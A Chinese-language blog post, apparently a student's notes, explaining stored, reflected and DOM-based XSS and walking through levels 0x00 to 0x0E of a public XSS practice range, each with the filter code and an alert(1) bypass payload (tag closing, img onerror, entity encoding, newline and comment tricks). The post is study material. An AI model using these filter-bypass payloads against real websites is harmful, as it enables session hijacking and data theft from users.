<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1.0"/><meta name="author" content="LwhalE"/><meta name="copyright" content="LwhalE"/><meta name="theme-color" content="#FFB347"/><meta name="format-detection" content="telephone=no"/><meta name="keywords" content="web"/><meta name="mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-capable" content="yes"/><meta name="apple-touch-fullscreen" content="yes"/><meta name="application-name" content="Learning about XSS | LwhalE's blog"/><meta name="apple-mobile-web-app-title" content="Learning about XSS | LwhalE's blog"/><meta name="apple-mobile-web-app-status-bar-style" content="#FFB347"/><link rel="canonical" href="https://LwhalEee.github.io/2026/01/27/Learning-about-XSS/"/><meta name="description" content="XSS概念XSS（跨站脚本攻击）是一种常见的网络安全漏洞，攻击者将恶意的客户端脚本（通常是JavaScript）注入到用户访问的合法网站中，当用户浏览器执行这些脚本时，攻击者就能窃取用户数据（如Cookie）、冒充用户身份、劫持会话或在页面上执行任意操作。 XSS 攻击的类型Stored XSS 前端–&gt;后端–&gt;数据库–&gt;后端–&gt;前端  存储型XSS，也叫持久型XSS...">
<meta property="og:type" content="article">
<meta property="og:title" content="Learning about XSS | LwhalE&#39;s blog">
<meta property="og:url" content="https://lwhaleee.github.io/2026/01/27/Learning-about-XSS/index.html">
<meta property="og:site_name" content="LwhalE&#39;s blog">
<meta property="og:description" content="XSS概念XSS（跨站脚本攻击）是一种常见的网络安全漏洞，攻击者将恶意的客户端脚本（通常是JavaScript）注入到用户访问的合法网站中，当用户浏览器执行这些脚本时，攻击者就能窃取用户数据（如Cookie）、冒充用户身份、劫持会话或在页面上执行任意操作。 XSS 攻击的类型Stored XSS 前端–&gt;后端–&gt;数据库–&gt;后端–&gt;前端  存储型XSS，也叫持久型XSS...">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://lwhaleee.github.io/images/Hexo-Theme-MEOW.png">
<meta property="article:published_time" content="2026-01-27T07:05:39.000Z">
<meta property="article:modified_time" content="2026-01-27T07:37:32.702Z">
<meta property="article:author" content="LwhalE">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://lwhaleee.github.io/images/Hexo-Theme-MEOW.png"><meta name="robots" content="index,follow"/><meta name="googlebot" content="index,follow"/><meta name="revisit-after" content="1 days"/><title>Learning about XSS | LwhalE's blog</title><link rel="shortcut icon" href="/images/Hexo-Theme-MEOW.ico"><link rel="preconnect" href="/assets"/><link rel="preconnect" href="assets"/>
<link rel="stylesheet" href="/css/style.css">
<link rel="prefetch" href="/"/><link rel="prefetch" href="/archives"/><link rel="prefetch" href="/tags"/><meta name="generator" content="Hexo 8.1.1"></head><body bg-style="none"><header><div id="navbar"><div id="nav-info"><a id="site-icon" href="/" title="主页"><img src="/images/Hexo-Theme-MEOW.png" alt="Logo"/></a><a id="site-name" href="/" title="主页"><div>LwhalE's blog</div><img src="/assets/images/svg/uc/uc-home.svg" class="icon noview" alt="Icon"></a></div><div id="nav-menu"><div class="menu-item"><a href="/"><img src="/assets/images/svg/uc/uc-article.svg" class="icon noview" alt="Icon"><span>首页</span></a></div><div class="menu-item"><a href="/archives"><img src="/assets/images/svg/uc/uc-archive.svg" class="icon noview" alt="Icon"><span>归档</span></a></div><div class="menu-item"><a href="/categories"><img src="/assets/images/svg/uc/uc-category.svg" class="icon noview" alt="Icon"><span>分类</span></a></div><div class="menu-item"><a href="/tags"><img src="/assets/images/svg/uc/uc-tag.svg" class="icon noview" alt="Icon"><span>标签</span></a></div><div class="menu-item"><a href="/about"><img src="/assets/images/svg/uc/uc-about.svg" class="icon noview" alt="Icon"><span>关于</span></a></div></div><div id="nav-function"><div id="menu-btn"><a href="javascript:void(0);" title="打开菜单"><img src="/assets/images/svg/uc/uc-menu.svg" class="icon noview" alt="Icon"></a></div></div></div></header><div id="menu-aside"><div id="menu-aside-container"><div id="menu-aside-info"><a href="/" title="主页"><img src="/images/Hexo-Theme-MEOW.png" alt="Logo"/></a><a href="/" title="主页">LwhalE's blog</a></div><div class="menu-aside-item"><a href="/"><img src="/assets/images/svg/uc/uc-article.svg" class="icon noview" alt="Icon"><span>首页</span></a></div><div class="menu-aside-item"><a href="/archives"><img src="/assets/images/svg/uc/uc-archive.svg" class="icon noview" alt="Icon"><span>归档</span></a></div><div class="menu-aside-item"><a href="/categories"><img src="/assets/images/svg/uc/uc-category.svg" class="icon noview" alt="Icon"><span>分类</span></a></div><div class="menu-aside-item"><a href="/tags"><img src="/assets/images/svg/uc/uc-tag.svg" class="icon noview" alt="Icon"><span>标签</span></a></div><div class="menu-aside-item"><a href="/about"><img src="/assets/images/svg/uc/uc-about.svg" class="icon noview" alt="Icon"><span>关于</span></a></div><hr/></div></div><main><div class="banner"><div class="banner-info"><div class="banner-avatar"><img src="/images/Hexo-Theme-MEOW.png" alt="Avatar"/></div><div class="banner-title">「 Lwhale's Blog 」</div></div></div><div class="post-container"><div class="post-main"><div class="post-content"><h1 class="post-title">Learning about XSS</h1><div class="post-author"><span>作者: LwhalE</span></div><div class="post-meta"><div class="post-info"><div class="post-date"><div class="post-pubdate"><img src="/assets/images/svg/ta/ta-pubdate.svg" class="icon noview" alt="Icon"><span>发表于2026-01-27</span></div><div class="post-update"><img src="/assets/images/svg/ta/ta-update.svg" class="icon noview" alt="Icon"><span>更新于2026-01-27</span></div></div><div class="post-read"></div></div><div class="post-attribute"><div class="post-categories"><img src="/assets/images/svg/ta/ta-category.svg" class="icon noview" alt="Icon"><span><a class="post-categories-link" href="/categories/learning/">learning</a></span></div><div class="post-tags"><img src="/assets/images/svg/ta/ta-tag.svg" class="icon noview" alt="Icon"><span><a class="post-tags-link" href="/tags/web/" rel="tag">web</a></span></div></div></div><div class="post markdown" indent="false"><h2 id="XSS概念"><a href="#XSS概念" class="headerlink" title="XSS概念"></a>XSS概念</h2><p>XSS（跨站脚本攻击）是一种常见的网络安全漏洞，攻击者将恶意的客户端脚本（通常是JavaScript）注入到用户访问的合法网站中，当用户浏览器执行这些脚本时，攻击者就能窃取用户数据（如Cookie）、冒充用户身份、劫持会话或在页面上执行任意操作。</p>
<h2 id="XSS-攻击的类型"><a href="#XSS-攻击的类型" class="headerlink" title="XSS 攻击的类型"></a>XSS 攻击的类型</h2><h4 id="Stored-XSS"><a href="#Stored-XSS" class="headerlink" title="Stored XSS"></a>Stored XSS</h4><ul>
<li><p>前端–&gt;后端–&gt;数据库–&gt;后端–&gt;前端</p>
</li>
<li><p>存储型XSS，也叫持久型XSS，主要是将XSS代码发送到服务器（不管是数据库、内存还是文件系统等），然后在下次请求页面的时候，服务器从数据库中读取数据，没有做XSS相关处理，直接输出给浏览器，导致攻击代码被执行。</p>
</li>
<li><p>讲恶意的数据包含在HTTP响应中，在后续HTTP响应中会继续执行</p>
</li>
<li><p>这一类典型案例：留言板XSS</p>
</li>
</ul>
<h4 id="Reflected-XSS"><a href="#Reflected-XSS" class="headerlink" title="Reflected XSS"></a>Reflected XSS</h4><ul>
<li><p>前端–&gt;后端–&gt;前端</p>
</li>
<li><p>此类型不会被存在资料库中，主要透过用户发出恶意的请求，倘若后端没有过滤而直接将结果回传前端的话，就有可能执行到恶意的代码</p>
</li>
<li><p>攻击者构造一个包含脚本的URL，并让正常用户打开这个<code>url</code>，这样XSS代码出现在请求URL中，作为参数提交到服务器，服务器对参数没有进行XSS相关处理，直接解析并响应。响应结果中包含XSS代码，最后浏览器解析并执行。</p>
<p>攻击过程中恶意数据被服务器“反弹”给用户的浏览器，故称为反射型XSS。</p>
<p>**特点：**反射型XSS主要服务端没有对外来数据进行XSS处理，就直接发送给浏览器，导致出现XSS攻击。</p>
</li>
</ul>
<div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="title function_">alert</span>(<span class="string">&quot;hey!&quot;</span>);</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<h4 id="DOM-Based-XSS"><a href="#DOM-Based-XSS" class="headerlink" title="DOM-Based XSS"></a>DOM-Based XSS</h4><ul>
<li>前端–&gt;浏览器</li>
<li>这种情况不依赖于是否将恶意程序放置于服务器，而是修改页面的DOM节点，效果上说也属于反射型XSS。</li>
<li>文档对象模型（DOM）是一个网络文档的编程接口。 它代表页面，以便程序可以改变文档的结构、风格和内容。 DOM 将文档表示为节点和对象；这样，编程语言就可以与页面交互。 网页是一个既可以在浏览器窗口中显示，也可以作为HTML 源代码的文档。</li>
<li>客户端JavaScript可以访问浏览器的DOM文本对象模型是利用的前提，当确认客户端代码中有DOM型XSS漏洞时，并且能诱使(钓鱼)一名用户访问自己构造的URL，就说明可以在受害者的客户端注入恶意脚本。</li>
<li>直接交给浏览器执行</li>
</ul>
<p>反射型和DOM型的差异理解：</p>
<p><a target="_blank" rel="noopener" href="https://gt4404gb.com/archives/1363">这一篇文章讲的比较清楚</a></p>
<ul>
<li>总结一下就是：反射型的<code>xss</code>会把写好的内容直接放进HTML代码里，就是会接触服务器，而DOM型是通过网页本身的JavaScript进行渲染触发的，DOM型XSS的payload不直接输出于相应体中，而是通过一段<code>js</code>处理的方式，把这个payload以某种方法给带出来，再在前端加载的时候实际触发。</li>
</ul>
<h2 id="XSS靶场wp-1"><a href="#XSS靶场wp-1" class="headerlink" title="XSS靶场wp-1"></a>XSS靶场wp-1</h2><p><a target="_blank" rel="noopener" href="https://xss.haozi.me/">靶场</a></p>
<p>我先打了一部分另一个黑盒靶场，所以再过来打就感觉相对轻松一些</p>
<h3 id="0x00"><a href="#0x00" class="headerlink" title="0x00"></a>0x00</h3><div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span>alert(1)<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<h3 id="0x01"><a href="#0x01" class="headerlink" title="0x01"></a>0x01</h3><p>标签<code>&lt;/textarea&gt;</code>会让输入的内容作为文本，而不会被JavaScript解释器处理，所以把前面的标签截断</p>
<div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;/<span class="name">textarea</span>&gt;</span><span class="tag">&lt;<span class="name">script</span>&gt;</span>alert(1)<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<h3 id="0x02"><a href="#0x02" class="headerlink" title="0x02"></a>0x02</h3><p>提交变量value</p>
<p>先闭合让script语句单独出去作为一个单独的HTML语句执行</p>
<div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;<span class="tag">&lt;<span class="name">script</span>&gt;</span>alert(1)<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>后面的可以注释掉</p>
<h3 id="0x03"><a href="#0x03" class="headerlink" title="0x03"></a>0x03</h3><p><code>stripbracketsRe</code>的作用是将指定的符号替换 这里是被替换为空</p>
<p>HTML编码只能放在标签内，所以如果用script标签就不能采取这种方式</p>
<p>编码有十进制和十六进制，是十六进制的可以显示完成，而十进制的会直接弹窗，也就是说实际上是注入成功了的，但是靶场没有设置这个检查</p>
<div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">0</span> <span class="attr">onerror</span>=<span class="string">&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#34;&amp;#104;&amp;#97;&amp;#99;&amp;#107;&amp;#34;&amp;#41;</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!--这里是十进制的--&gt;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/%5Cimages%5CBLOG%5CXSS%5Cimage-20260118174923481.png" ></p>
<div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">0</span> <span class="attr">onerror</span>=<span class="string">&quot;alert(1)&quot;</span>&gt;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><code>onerror</code>事件在加载外部文件（文档或图像）发生错误时触发。  </p>
<p>随意命名的图像或者文档本来就是不存在的，所以一定会出现这个报错</p>
<p>反引号也可以</p>
<div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript">alert<span class="string">`1`</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span><span class="comment">&lt;!--</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<h3 id="0x04"><a href="#0x04" class="headerlink" title="0x04"></a>0x04</h3><p>编码方式同上</p>
<pre><code class="language-html">&lt;img src=0 onerror=&amp;#x61;&amp;#x6C;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x31;&amp;#x29;&gt;
</code></pre>
<h3 id="0x05"><a href="#0x05" class="headerlink" title="0x05"></a>0x05</h3><p>单行注释符被替换</p>
<p>但是可以用多行注释符闭合</p>
<pre><code class="language-html">--!&gt;&lt;script&gt;alert(1)&lt;/script&gt;
</code></pre>
<h3 id="0x06"><a href="#0x06" class="headerlink" title="0x06"></a>0x06</h3><pre><code class="language-javascript">input = input.replace(/auto|on.*=|&gt;/ig, &#39;_&#39;)
</code></pre>
<p>不能闭合了，所以只能用图片报错来</p>
<p>这里的on匹配不是直接和等号<a target="_blank" rel="noopener" href="https://blog.csdn.net/zzrshuiwuhen/article/details/8880751">匹配</a>的，<code>on.*=/ig</code> 会匹配 on 字符后面除了换行符以外的任何字符后的等号</p>
<p>这里感觉和C语言的输入替换有点像，和<code>%*c</code>那个一样，但是C的可以用于处理换行符，这里利用的是不能替代换行符</p>
<pre><code class="language-html">type=&quot;image&quot; src=&quot;x&quot; onerror
=&quot;alert(1)&quot;
</code></pre>
<h3 id="0x07"><a href="#0x07" class="headerlink" title="0x07"></a>0x07</h3><pre><code class="language-JavaScript">function render (input) &amp;#123;
  const stripTagsRe = /&lt;\/?[^&gt;]+&gt;/gi

  input = input.replace(stripTagsRe, &#39;&#39;)
  return `&lt;article&gt;$&amp;#123;input&amp;#125;&lt;/article&gt;`
&amp;#125;
</code></pre>
<p>html即使没有右边尖括号依旧可以执行</p>
<p>过滤了 <code>&lt;任意大于 0 个的除了右尖括号以外的字符&gt;</code> 和 <code>&lt;/任意大于 0 个的除了右尖括号以外的字符&gt;</code> 这样的结构</p>
<pre><code class="language-html">&lt;img src=&quot;x&quot; onerror=&quot;alert(1)&quot;
</code></pre>
<p>正则表达式还需要学习一下</p>
<h3 id="0x08"><a href="#0x08" class="headerlink" title="0x08"></a>0x08</h3><p>直接用会被替换</p>
<p> HTML 标签在文字与右尖括号之间的空格不会影响解析，因此使用空格绕过</p>
<p>换行符也可以</p>
<pre><code class="language-html">&lt;/style &gt;&lt;script&gt;alert(1)&lt;/script&gt;
或者
&lt;/style
&gt;&lt;script&gt;alert(1)&lt;/script&gt;
</code></pre>
<h3 id="0x09"><a href="#0x09" class="headerlink" title="0x09"></a>0x09</h3><p>必须包含http的部分</p>
<pre><code class="language-javascript">function render (input) &amp;#123;
  let domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) &amp;#123;
    return `&lt;script src=&quot;$&amp;#123;input&amp;#125;&quot;&gt;&lt;/script&gt;`
  &amp;#125;
  return &#39;Invalid URL&#39;
&amp;#125;
</code></pre>
<p>然后这里需要加入的网址本身就是错误的地址可以直接用<code>onerror</code>，如果是可用的网址，那么就双写</p>
<h3 id="0x0A"><a href="#0x0A" class="headerlink" title="0x0A"></a>0x0A</h3><pre><code class="language-JavaScript">function render (input) &amp;#123;
  function escapeHtml(s) &amp;#123;
    return s.replace(/&amp;/g, &#39;&amp;amp;&#39;)
            .replace(/&#39;/g, &#39;&amp;#39;&#39;)
            .replace(/&quot;/g, &#39;&amp;quot;&#39;)
            .replace(/&lt;/g, &#39;&amp;lt;&#39;)
            .replace(/&gt;/g, &#39;&amp;gt;&#39;)
            .replace(/\//g, &#39;&amp;#x2f&#39;)
  &amp;#125;

  const domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) &amp;#123;
    return `&lt;script src=&quot;$&amp;#123;escapeHtml(input)&amp;#125;&quot;&gt;&lt;/script&gt;`
  &amp;#125;
  return &#39;Invalid URL&#39;
&amp;#125;
</code></pre>
<p><code>src</code>：指定资源内容，（包括路径或者文件内容之类的）</p>
<p>这里访问直接就是对应的<code>js</code>文件</p>
<pre><code class="language-url">https://www.segmentfault.com.haozi.me/j.js
</code></pre>
<p>使用 @ 会以 @ 前的字符串作为用户名来访问 @ 后面的网址 </p>
<p>是个新知识，但是这里用@没成功，不知道为什么</p>
<h3 id="0x0B"><a href="#0x0B" class="headerlink" title="0x0B"></a>0x0B</h3><pre><code class="language-JavaScript">function render (input) &amp;#123;
  input = input.toUpperCase()
  return `&lt;h1&gt;$&amp;#123;input&amp;#125;&lt;/h1&gt;`
&amp;#125;
</code></pre>
<p><code>&lt;h1&gt;</code>这个是标题格式</p>
<p>所以就是呈现不需要闭合前面的</p>
<p>大小写不影响标签的执行，只是输出会改变大小写，所以直接加</p>
<ul>
<li>HTML 标签和属性名称不区分大小写</li>
</ul>
<p>但是JavaScript解释器是需要分析大小写的所以编码绕过</p>
<pre><code class="language-html">&lt;img src=1 onerror=&quot;&amp;#x6A;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3A;&amp;#x61;&amp;#x6C;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x31;&amp;#x29;&quot;&gt;
</code></pre>
<h3 id="0x0C"><a href="#0x0C" class="headerlink" title="0x0C"></a>0x0C</h3><pre><code class="language-JavaScript">function render (input) &amp;#123;
  input = input.replace(/script/ig, &#39;&#39;)
  input = input.toUpperCase()
  return &#39;&lt;h1&gt;&#39; + input + &#39;&lt;/h1&gt;&#39;
&amp;#125;
</code></pre>
<p>用<code>img</code>标签或者双写</p>
<p>payload</p>
<pre><code class="language-html">&lt;img src=1 onerror=&quot;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#49;&amp;#41;&quot;&gt;
</code></pre>
<p>理论上双写应该可以，但是没成功，为什么</p>
<h3 id="0x0D"><a href="#0x0D" class="headerlink" title="0x0D"></a>0x0D</h3><pre><code class="language-javascript">function render (input) &amp;#123;
  input = input.replace(/[&lt;/&quot;&#39;]/g, &#39;&#39;)
  return `
    &lt;script&gt;
          // alert(&#39;$&amp;#123;input&amp;#125;&#39;)
    &lt;/script&gt;
  `
&amp;#125;
</code></pre>
<p>这里input直接拼到alert上，通过回车避开前面的<code>(&#39;</code>，再用注释符去掉闭合的<code>&#39;)</code></p>
<div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">alert(1)</span><br><span class="line">--&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>这个注释符可以闭合单行注释也可以闭合多行注释，闭合之后就无视之后的部分</p>
<h3 id="0x0E"><a href="#0x0E" class="headerlink" title="0x0E"></a>0x0E</h3><div class="code-container" code-lang="Javascript"><div class="codebox"><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">render</span> (<span class="params">input</span>) &#123;</span><br><span class="line">  input = input.<span class="title function_">replace</span>(<span class="regexp">/&lt;([a-zA-Z])/g</span>, <span class="string">&#x27;&lt;_$1&#x27;</span>)</span><br><span class="line">  input = input.<span class="title function_">toUpperCase</span>()</span><br><span class="line">  <span class="keyword">return</span> <span class="string">&#x27;&lt;h1&gt;&#x27;</span> + input + <span class="string">&#x27;&lt;/h1&gt;&#x27;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

